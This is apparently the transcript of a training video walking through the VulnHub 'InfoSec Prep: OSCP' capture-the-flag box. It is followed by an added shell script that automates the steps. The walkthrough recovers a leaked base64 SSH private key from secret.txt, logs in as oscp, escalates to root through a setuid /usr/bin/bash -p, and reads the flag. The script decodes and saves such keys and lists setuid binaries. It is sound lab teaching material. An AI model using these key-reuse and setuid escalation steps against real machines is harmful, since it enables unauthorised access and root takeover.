[00:00:00] Greetings, I'm Professor K, and in this video presentation we're going to see how we go about completing the CTF walkthrough for InfoSec Prep: OSCP. This CTF was created by FalconSpy with the support of the staff at InfoSec. This CTF is rated as easy, but there are plenty of walkthroughs available on the Internet and on YouTube that make it much harder than it needs to be. This walkthrough was built using a number of online resources and walkthroughs, including the walkthrough from the YouTube channel of IT Security Labs and the website Passing OSCP by Alex Dhiab.

[00:00:42] The lab requirements for this capture-the-flag exercise are one install of either VirtualBox or VMware (VirtualBox is preferred), one virtual install of Kali Linux, and one virtual install of the InfoSec Prep: OSCP OVA file, which can be downloaded from the VulnHub site. All links are provided for you inside of the lab file.

[00:01:07] To begin the lab, we need both your Kali attack machine and the OSCP target up and running inside of either VirtualBox or VMware. Next, ensure both of their network settings are configured for NAT Network. Let's see how that's done. So I'm going to go up to Devices and go to Network. And I'm going to do this on both my machine and the target machine, and I'm going to ensure that the network settings are NAT Network.
[00:01:35] Once you have both virtual machines up and running, open up your target machine and you will have a terminal. At the top left of the terminal you will see an IP address that's been assigned to you for this particular machine. Take note of that IP address. You will need it for the lab.

[00:01:53] The next thing you want to do is open up a terminal on your Kali machine and run ifconfig. It should show that you have an IP address for your eth0 adapter, or whatever Ethernet adapter is currently being used to connect you to this virtual network between you and your target. I'm going to type in clear. Now, I'm going to go ahead and ensure that I have connectivity between my Kali machine and my target by doing a ping. And I have good replies. Now, to break out of the sequence, I'm just going to do a Ctrl+C, and I can close out my terminal.

[00:02:34] On your Kali machine, right-click on the desktop and from the context menu scroll on down to where it says Create Folder. You're going to create a new folder, and you can call it OSCP. Once you have that folder created, go ahead and right-click on it and select from the context menu Open Terminal Here. And so, as with every capture-the-flag exercise or pentest, the first thing we have to do is enumerate.
[00:03:01] So we have a target and we're going to enumerate it using nmap, and we're going to be looking for any services or ports that are currently running on that target that we might be able to exploit. So at the command prompt: nmap, space, dash lowercase s uppercase C, space, dash lowercase s uppercase V (that is, nmap -sC -sV), followed by the IP address of my target. Now, this is my IP address for my target. Your IP address will differ. Go ahead and hit Enter.

[00:03:36] And nmap quickly returns our scan results, and we see that our target is running SSH on port 22 and an Apache web server running on port 80. We also have all the version information for the software running on ports 22 and 80 that we need in case we need to download exploits or run scripts. Now, what's interesting about the web server is it shows us that there is a robots.txt file, and it has one disallowed entry that might be of interest to us. And it also has a secret.txt file that is part of that robots.txt. So we're going to take a look at that in just a moment. But first, we're going to do some more enumeration, so let's go ahead and minimize this terminal, and if we need to, we can come back to the information later. And we're going to open up a new terminal and we're going to continue on with our enumeration, running gobuster.
[00:04:35] And I'm going to go ahead and copy and paste this long command from my lab file. Gobuster is a tool for brute-forcing URIs (files and directories) and DNS subdomains. So what I've done here is I typed in gobuster, space. I wanted to look for directories, so dir, then dash u on the server with the address of 10.0.2.17, and we're going to use a wordlist. That's what the dash w stands for. And that wordlist is located up inside of /usr/share/wordlists, in the dirbuster directory inside of that, and it is called directory-list-2.3-medium.txt. And we're looking for file types, which is what the dash x represents. I want to look for file types php, html and txt. Go ahead, run the command.

[00:05:41] As it goes, and the results continue to flow in, we learn that we have a WordPress site running on our target. We have the WordPress content, the login, the license, the readme.html file. And, of course, a robots.txt, along with the secret.txt that we're going to take a look at in just a moment. But you see that we have a lot of good targets that we can go after here, and we can run WPScan. We could run some other tools if we so desire, but we're still in the enumeration phase.
[00:06:14] And so what I'm interested in is what's inside of that robots.txt file. And I'm especially interested in what's going on with that secret.txt. So what we're going to do next is open up a web browser, and we're going to go after that low-hanging fruit that we just discussed. So let's go ahead and minimize this terminal, we can come back to it later if we so desire, and let's go ahead and open up a web browser.

[00:06:42] So I've opened up my browser inside of my desktop, and I've just typed in the IP address of the target, which was 10.0.2.17. This is my IP address. Your IP address will probably differ, and we can start by going over some of the information that's available to us up inside of this website. So let's begin by looking over the homepage here. And one thing that is of interest is that we find that there's only one user account that is available for this box, and that user is oscp. We'll need to know that for later on. We can also take a look at the source information, so I can click on this web page and I can view the page source. Now, a lot of times up inside of the page source you'll find that there are a lot of comments, and there may be little pieces of information regarding passwords, user accounts and other information. Now, we're not seeing any of that on here.
[00:07:42] But as you go through these other sites and you do your prep for the OSCP, this is something that you want to be aware of. Always look at the page source information to ensure that you're not missing anything that's going to set you back. You want to make sure you scroll on down here and you take a look at all the different links that you have available. There's Hello World. You've got a number of different links in here that you can take a look at. Now, all of these are avenues for possible exploits, but we're going to do it a little differently. We're not going to use tools for this CTF. Primarily, what we're going to do is use just the command line, and we're going to capture that flag and see how we do that.

[00:08:30] Now, to look at the robots.txt file, all I have to do is type in, or append, a /robots.txt to the IP address of the target. And you'll see here that we have something called secret. Let me go ahead and adjust my view here. OK, that's better. Now you can see that we have a secret.txt. Now, the robots.txt is designed to tell any of the spiders out there that are crawling the web looking for information to catalog to ignore the secret.txt.
[00:09:11] In this case, we're telling the web crawlers: do not catalog this particular resource that is on this web server, disallow it. And a lot of times you also find other information up here, such as versioning, and you might even find a username or even a password that might be available to you that's been posted by the admin.

[00:09:33] Now, to look inside of that secret.txt, all I did was remove the robots.txt from the IP address and I appended a /secret.txt to the IP address. I hit Enter and now I'm showing the contents. And what we have here is base64 code, and it's probably going to be for an SSH key. Now, the next thing we need to do is take everything that's inside of this secret.txt, and we're going to copy it. So I'm going to go ahead and make sure I have everything copied from the top to the bottom. I'm going to right-click and I'm going to copy. I'm then going to open up a new browser tab, and in the search bar I'm going to type in "base64 decoder". From those results, I'll take the first one and I'm going to launch it, and I'm going to go to the website that's going to allow me to decode this base64 hash. In its first window, I'm going to go ahead and do a Ctrl+V and paste everything that I just copied off of that secret.txt file. I want to scroll on down and I'm going to press the Decode button.
[00:10:45] And this is your decoded base64 code that we copied over from that secret.txt file. Now, in this case, we have what's called a private key for OpenSSH. So we're going to go ahead and copy this, and the way I'm going to do this is place my mouse inside of the second window. I'm going to do a Ctrl+A. I'll do a Ctrl+C. I'm now going to minimize my browser.

[00:11:14] Once I'm back to my desktop, I'm just going to find my working directory, which is OSCP, right-click on it, and from the context menu I'm going to select Open Terminal Here. Now I'm going to create a text file using an editor. nano is my editor of choice, but you're free to use any text editor you want. I'm going to type in nano space key.rsa. I'm going to hit Enter. Now I have a blank file. I'm going to right-click inside of this blank file and I'm going to select Paste Clipboard. Now I'm going to paste the contents of that OpenSSH private key into this text file, and I'm going to save it by doing a Ctrl+X. I do a Ctrl+X and then it asks me, do you want to save the modified buffer? I'll type in Y for yes. Now I'm going to hit Enter and we're back to the prompt. Now, to see if I actually have that file inside of my OSCP directory:
[00:12:17] I'll just type in ls. I see that I do have a file called key.rsa. If I want to see if I actually saved the contents to this text file called key.rsa, I can just do a cat, space, and type in the name of the file that I want to print out to the terminal, which in this case is key.rsa. Hit Enter, and I see that I have the private key.

[00:12:44] You can go ahead and close out this terminal now. The next thing we have to do for that file that we just created for the OpenSSH private key is we have to set the permissions so that we have access to it when we get ready to launch that SSH shell over onto the target. Now, to do this, I'm going to use the chmod command, and I'm going to use the number 600, and I'm going to assign this permission to the key.rsa file. I'm going to go ahead and hit Enter. And it comes back to the command prompt, letting me know that my command completed successfully.

[00:13:20] So earlier on, we discovered that there was only one user on that web server, and that was oscp. Up inside of the secret.txt, we discovered the base64 code for the OpenSSH private key. Now that we have both of those pieces of information, we can attempt to establish an SSH session onto the target machine. At my prompt, I typed in ssh, space, the name of the user, which is oscp, at the IP address of my target, which is 10.0.2.17, space, dash i, which means use the following file for the key, which is key.rsa (that is, ssh oscp@10.0.2.17 -i key.rsa). I want to go ahead and hit Enter.

[00:14:09] And it comes back and logs me on as oscp to the target machine using SSH. I want to see if I can find the permissions and see if I'm logged on as a sudoer or root, and to do that, I'm just going to type in sudo space dash i. Hit Enter. And now it wants the sudo password, which we don't have. So the next thing that we need to do is find out exactly what permissions I currently have available to me as the logged-on user that I currently am. Now, to do this, I'm just going to type in the following command here. The meaning of all this, that is to say the command syntax, is available to you up inside the lab file. I'm going to go ahead and hit Enter. And as you can see, it's pulling up all of the files and directories that I currently have access to. It's not telling me the permissions, but that's OK. I think we've got an option here that's going to get us into root, which is where we need to be, and that's going to be using the bash. But let's see how we do that.

[00:15:19] Now, bash is most likely going to have root access to the system, and that means that whoever's using it is going to have root access. So we're going to go ahead and type in the following. We're going to type in a forward slash usr, forward slash bin, forward slash bash. And we want to assign these permissions to the current user, so I'm typing a dash p (that is, /usr/bin/bash -p). Now, if I run the id command, we can see exactly what permissions the user who's using the bash permissions actually has. So I type in id, hit Enter. And you can see that I'm now a member of the group 0, which has root access, and that's what we need.

[00:16:09] So the next thing we want to do is change over to the root of the machine. To do this, you can type in cd space forward slash. I'm going to hit Enter, and now I'm at the root of the machine. Now, the next thing we want to do is an ls to see what's actually available to us here. So I'm typing ls, and you'll see that we have a root folder. So we want to get into the root folder, because that's where our flag is. So I type in cd space forward slash root. And I should be inside of that root folder now, and to check, I can just do another ls, hit Enter, and you'll see that we have a number of items inside of here. And one of those is the flag.txt. Now, to get the key to complete this capture-the-flag exercise, I'm going to go ahead and cat that text file out by typing in cat space flag.txt, and you'll see that we have the key presented to us.

[00:17:14] And so you can see that this capture-the-flag exercise was very easy, but it was made easy by the individuals that actually worked on producing the walkthroughs that I used for this video presentation. Now, that doesn't mean that it's always easy, because there are a lot of other walkthroughs that are 40 minutes long, 15 minutes long and even over an hour long as they go through the process of trying to capture that flag. But we captured the flag without using any of the utilities at our disposal. We didn't have to run WPScan or any other tools to try to capture a password or figure out how to get access to a shell on the target. We did it using just observation and enumeration of the target and looking for clues.

[00:18:06] And so that's going to conclude this short video presentation on how we go about completing the walkthrough for the InfoSec Prep OSCP capture-the-flag exercise. You got questions? You got concerns? Don't hesitate to reach out and contact your instructor, and I'll see you in my next video.
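The key-handling steps the video performs in a browser and in nano (decode the base64 from secret.txt, save it as key.rsa, chmod 600, then ssh -i key.rsa oscp@target), followed by the setuid check that leads to bash -p, as reusable shell functions. This is an added example and is not part of the video, its lab file or the InfoSec Prep box; the sample key blob is constructed, the user name oscp and the address 10.0.2.17 are the ones the video uses, and the script never touches the network: it only builds the ssh command line for you to run.

```shell
#!/usr/bin/env bash
# Added example (not from the video or its lab file): the key-handling and
# setuid-hunting steps of the walkthrough as reusable shell functions.
set -euo pipefail

# Decode the base64 blob served as /secret.txt into a key file.
# The file is created under umask 077 so it is never readable by other users,
# and it is kept only if it really is a PEM/OpenSSH private key; otherwise the
# function removes it and returns 1 (e.g. when the page held something else).
decode_ssh_key() {
  local b64_file="$1" key_file="$2"
  # strip the spaces and newlines a browser copy-paste leaves in the blob
  if ! ( umask 077; tr -d ' \t\r\n' < "$b64_file" | base64 -d > "$key_file" ) 2>/dev/null; then
    rm -f "$key_file"; return 1
  fi
  if ! head -n 1 "$key_file" | grep -q -- '-----BEGIN .*PRIVATE KEY-----'; then
    rm -f "$key_file"; return 1
  fi
  chmod 600 "$key_file"   # what the video does by hand; ssh refuses group/world-readable keys
}

# Permission string of a file, e.g. "-rw-------" for mode 600.
key_perms() { ls -l "$1" | cut -c1-10; }

# The ssh command the video types, built from user, host and key (not executed here).
ssh_command() { printf 'ssh -i %s %s@%s\n' "$3" "$1" "$2"; }

# List setuid binaries below a directory: the check that reveals /usr/bin/bash
# on the target. If bash is setuid root, "bash -p" keeps the effective uid 0
# instead of dropping privileges, which is the escalation the video uses.
list_suid() { find "$1" -xdev -type f -perm -4000 2>/dev/null | sort; }

# --- offline demo with constructed input --------------------------------------
demo() {
  local work; work=$(mktemp -d)
  # constructed stand-in for the body of http://<target>/secret.txt
  printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nZHVtbXk=\n-----END OPENSSH PRIVATE KEY-----\n' \
    | base64 > "$work/secret.txt"
  decode_ssh_key "$work/secret.txt" "$work/key.rsa"
  echo "key saved with perms $(key_perms "$work/key.rsa")"
  echo "next: $(ssh_command oscp 10.0.2.17 "$work/key.rsa")"   # 10.0.2.17 is the video's lab address
  # on the target, once logged in:  list_suid /   and then  /usr/bin/bash -p  if bash is listed
  rm -rf "$work"
}
demo
```

Running the script prints the 600-mode confirmation and the ssh line to copy; on the target, list_suid / is the one-liner equivalent of the "find the permissions" step in the video, and the id output after /usr/bin/bash -p should show euid=0.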